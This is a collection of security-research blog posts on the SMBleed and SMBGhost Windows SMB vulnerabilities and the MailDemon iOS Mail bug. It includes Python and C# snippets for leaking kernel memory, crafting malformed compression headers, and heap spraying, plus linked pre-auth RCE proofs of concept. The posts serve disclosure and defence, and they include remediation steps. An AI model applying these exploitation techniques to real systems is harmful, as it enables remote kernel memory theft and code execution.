The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.

After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:

SMB2 NEGOTIATE → SMB2 SESSION_SETUP → SMB2 SESSION_SETUP

If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.

We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:

  • The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
  • The subsequent commands, until authentication completes successfully, must be SMB2 SESSION_SETUP. The only exception is if anonymous access to named pipes or shares is allowed, which it isn’t by default.

Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.

A closer look at SMB2 SESSION_SETUP

As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.

The NTLM Authenticate message

After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLMv2 Response structure. It’s a variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) status is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks verify the AvPairs field.

The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.

AvPairs inside the SMB2 packet.

The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.

At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:

The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:

  • length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
  • length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.

According to the server response we can deduce the answer to our question.
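
For illustration, here is a hedged sketch of how the controlled prefix of the AvPairs array could be built for one oracle query; deriving padding_len from the fixed SMB2/NTLM header sizes is omitted, and the helper only produces the AvPairs portion, not the full packet.

import struct

MsvAvNbComputerName = 0x0001
MsvAvNbDomainName   = 0x0002

def build_av_pairs_probe(padding_len, y):
    # First pair: a complete AV_PAIR (uint16 AvId, uint16 AvLen, AvLen value bytes, all
    # little endian) whose value only serves to push the second pair's AvLen field to
    # the byte offset we want to probe.
    sent = struct.pack("<HH", MsvAvNbComputerName, padding_len) + b"A" * padding_len
    # Second pair: only the AvId is actually sent; its 2-byte AvLen (and whatever follows)
    # is left as uninitialized pool data via SMBleed.
    sent += struct.pack("<H", MsvAvNbDomainName)
    # Declare y bytes after the AvLen field, so the pair passes the traversal check
    # (STATUS_LOGON_FAILURE) only when the uninitialized AvLen is <= y.
    declared_len = len(sent) + 2 + y
    return sent, declared_len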

So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.

Observation #1: Lookaside lists

As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.

The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same number of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.
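
As a sketch of the property we rely on, assuming SrvNetAllocateBuffer rounds each request up to one of the lookaside sizes in the table above: two allocations that round to the same size on the same logical processor come from the same list and therefore reuse the same buffer.

LOOKASIDE_SIZES = [0x1100, 0x2100, 0x4100, 0x8100, 0x10100,
                   0x20100, 0x40100, 0x80100, 0x100100]

def lookaside_bucket(alloc_size):
    # Returns the lookaside list a request of alloc_size bytes would be served from,
    # or None if it is too large for the lookaside lists.
    for size in LOOKASIDE_SIZES:
        if alloc_size <= size:
            return size
    return None

# Two packets whose allocations fall into the same bucket reuse the same buffer:
assert lookaside_bucket(0x1050) == lookaside_bucket(0x10FF) == 0x1100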

Observation #2: Failing the decompression

Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):

In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:

Back to the NTLM Authenticate message

We can use the above observations to make our technique work by using two steps:

  1. Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
  2. Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.

This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.

Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.
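
Since each query answers “is the byte larger than y?”, a simple binary search recovers a byte in at most eight queries; is_greater_than is a placeholder for one round of the two-step probe above.

def deduce_byte(is_greater_than):
    # is_greater_than(y) performs one round of the two-step probe above and returns
    # True if the uninitialized byte at the target offset is larger than y.
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo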

Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.

Overcoming the offset limitation

Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.
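
As a rough back-of-the-envelope, assuming the 0xADB reachable-offset limit from the previous section and the 16-byte shift per round:

import math

OFFSET_LIMIT = 0xADB   # furthest byte offset reachable with the AvPairs technique
LIFT_PER_ROUND = 16    # header bytes dropped by each decompression round

def lift_rounds_needed(target_offset):
    if target_offset <= OFFSET_LIMIT:
        return 0
    return math.ceil((target_offset - OFFSET_LIMIT) / LIFT_PER_ROUND)

print(lift_rounds_needed(0x1100))  # rounds needed to bring offset 0x1100 within reach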

Address leak POC

You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.

A different approach – decompression

While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.

Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.

We accomplished that by sending a valid packet followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):

There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:

  • length <= y: In this case the whole compressed block will consist of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
  • length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.

Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:

  1. Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
  2. Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.

Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the uninitialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out-of-bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.

The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation, it required sending a large number of packets, hurting performance and stability.

ZecOps Detection

ZecOps classifies forensic logs related to this issue with the tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security updates (recommended)
  • Blocking port 445 / enforcing host isolation
  • Disabling SMBv3.1.1 compression

Part II – Summary

In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.


SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

TL;DR

  • While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
  • SMBleed allows leaking kernel memory remotely.
  • Combined with SMBGhost, which was patched three months ago, SMBleed allows achieving pre-auth Remote Code Execution (RCE).
  • POC #1: SMBleed remote kernel memory read: POC #1 Link
  • POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link

Introduction

The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.


An observation

The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver.  Below is a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;


typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;


NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    if (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }


    ULONG FinalCompressedSize = 0;


    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }


    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }


    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

The SMBGhost bug happened due to a lack of integer overflow checks. It was fixed by Microsoft, and even though we didn’t add the check to our simplified function above, this time we will assume that the function checks for integer overflows and discards the message in those cases. Even with these checks in place, there’s still a serious bug. Can you spot it?

Faking OriginalCompressedSegmentSize again

Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:

The uninitialized kernel data is going to be treated as a part of our message.
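
As a hedged sketch of what the transform header of such a message could look like on the wire, following the struct layout shown above (the protocol ID and LZNT1 constant are standard SMB2 values; the sizes are illustrative):

import struct

COMPRESSED_PROTOCOL_ID = 0x424D53FC  # 0xFC 'S' 'M' 'B' as a little-endian ULONG
LZNT1 = 0x0001

def build_transform_header(original_size, algorithm=LZNT1, offset=0):
    # COMPRESSION_TRANSFORM_HEADER: ProtocolId, OriginalCompressedSegmentSize,
    # CompressionAlgorithm, Flags, Offset (see the struct definition above).
    return struct.pack("<IIHHI", COMPRESSED_PROTOCOL_ID, original_size, algorithm, 0, offset)

# If the data we send decompresses to x bytes, declaring x + 0x1000 makes the server
# treat 0x1000 bytes of uninitialized pool memory as part of our message.
x = 0x200  # illustrative decompressed size of the data we actually send
header = build_transform_header(x + 0x1000)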

If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only did this seemingly unnecessary, deliberate update of the FinalCompressedSize value make the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.

Basic exploitation

The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:

// HACK: fake size
if (((Smb2SinglePacket)packet).Header.Command == Smb2Command.WRITE)
{
    ((Smb2WriteRequestPacket)packet).PayLoad.Length += 0x1000;
    compressedPacket.Header.OriginalCompressedSegmentSize += 0x1000;
}

Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.

SMBleed POC Source Code

Affected Windows versions

Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrino we saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.

An unpatched system, null pointer dereference happens here.
A patched system, the added null pointer check.

Here’s a summary of the affected Windows versions with the relevant updates installed:

Windows 10 Version 2004

Update SMBGhost SMBleed
KB4557957 Not Vulnerable Not Vulnerable
Before KB4557957 Not Vulnerable Vulnerable

Windows 10 Version 1909

Update SMBGhost SMBleed
KB4560960 Not Vulnerable Not Vulnerable
KB4551762 Not Vulnerable Vulnerable
Before KB4551762 Vulnerable Vulnerable

Windows 10 Version 1903

Update Null Dereference Bug SMBGhost SMBleed
KB4560960 Fixed Not Vulnerable Not Vulnerable
KB4551762 Fixed Not Vulnerable Vulnerable
KB4512941 Fixed Vulnerable Vulnerable
None of the above Not Fixed Vulnerable Potentially vulnerable*

* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)

SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE

Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for  evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC. 

SMBGhost + SMBleed RCE POC Source Code

Detection

ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis and network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at threat_intel@zecops.com for more information.

Remediation

You can remediate both SMBleed and SMBGhost by doing one or more of the following things:

  1. Windows update will solve the issues completely (recommended)
  2. Blocking port 445 will stop lateral movements using these vulnerabilities
  3. Enforcing host isolation
  4. Disabling SMB 3.1.1 compression (not a recommended solution)

Shout out to Chompie, who exploited this bug with a different technique. Chompie’s POC is available here.


Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5. 

Our analysis concluded that the patches are different, and that the iOS 13.4.5 beta patch was incomplete and could still be vulnerable under certain circumstances.

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices. 

This may explain why it took about one month for a full patch to be released. 


iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.  

The function  -[MFMutableData appendBytes:length:] raises an exception if  -[MFMutableData _mapMutableData] returns false.

In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails, it returns false but still allocates an 8-byte chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which only partially solves the heap overflow issue.

 -[MFMutableData appendData:]
 |
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    |
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes, which will point to an 8-byte chunk if mmap fails. These functions do not check whether mmap failed, since the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136
-[MFMutableData mutableBytes]
|
+--  -[MFMutableData bytes]
   |
   +--  -[MFMutableData _mapMutableData:]

The bytes returned by mutableBytes are usually considered to be modifiable, per the following from Apple’s documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use the bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] return self->bytes, which points to the 8-byte chunk if mmap fails; this might lead to a heap overflow under some circumstances.

The following is an example of how things could go wrong; the heap overflow would still happen even if the length is checked before memcpy:

size_t length = 0x30000;
char* data = malloc(length);
MFMutableData* mdata = [[MFMutableData alloc] initWithBytesNoCopy:data length:length];
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes]; // mbytes could point to an 8-byte chunk if mmap failed
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len); // heap overflow if mmap failed
}

iOS 13.5 Patch

With the iOS 13.5 patch, an exception is raised in -[MFMutableData _mapMutableData] right after mmap fails, and the 8-byte chunk is no longer returned. This approach fixes the issue completely.

Summary

The iOS 13.5 patch is the correct way to fix the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete.

At ZecOps we help developers find security weaknesses and automatically validate whether an issue was correctly solved. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program.
If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.


Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge for yourself whether these bugs are worth an out-of-band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability in the wild from 10 years ago, on an iPhone 2G running iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but therein rests a surprise: the infoleak does not have to be in Mail, since an infoleak in almost any other process would be sufficient. Because dyld_shared_cache is shared across most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail; for example, CVE-2019-8646 in iMessage can do the trick remotely as well – which opens additional attack surface (FaceTime, other apps, iMessage, etc.). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious  in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions. 



MailDemon Bounty

Lastly, we will award a bounty for those submissions that are able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into memory. With the sprayed fake class containing a fake method cache for the ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
--->  
      UNUSED SPACE AT END

Thread 18 name:  Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4


Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for a heap spray in this case is a memory leak bug that can be triggered remotely, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such a primitive could qualify for up to a $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes, it allocates memory from the heap instead of creating a file to store the content. We can control the MFMutableData size by splitting the email content into lines shorter than 0x20000 bytes, since the IMAP library reads email content line by line. With this primitive we have a better chance of placing the payload at the address we want.
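
A hedged sketch of how such spray content could be generated; the 0x20000 threshold is the one mentioned above, and everything else (chunk value, sizes, line separator) is illustrative.

def build_spray_body(chunk, total_bytes, line_len=0x1F000):
    # Keep every line below the 0x20000 threshold so each MFMutableData chunk is backed
    # by a heap allocation rather than an mmap'ed file; repeating the chunk fills memory
    # with attacker-controlled data.
    assert line_len < 0x20000
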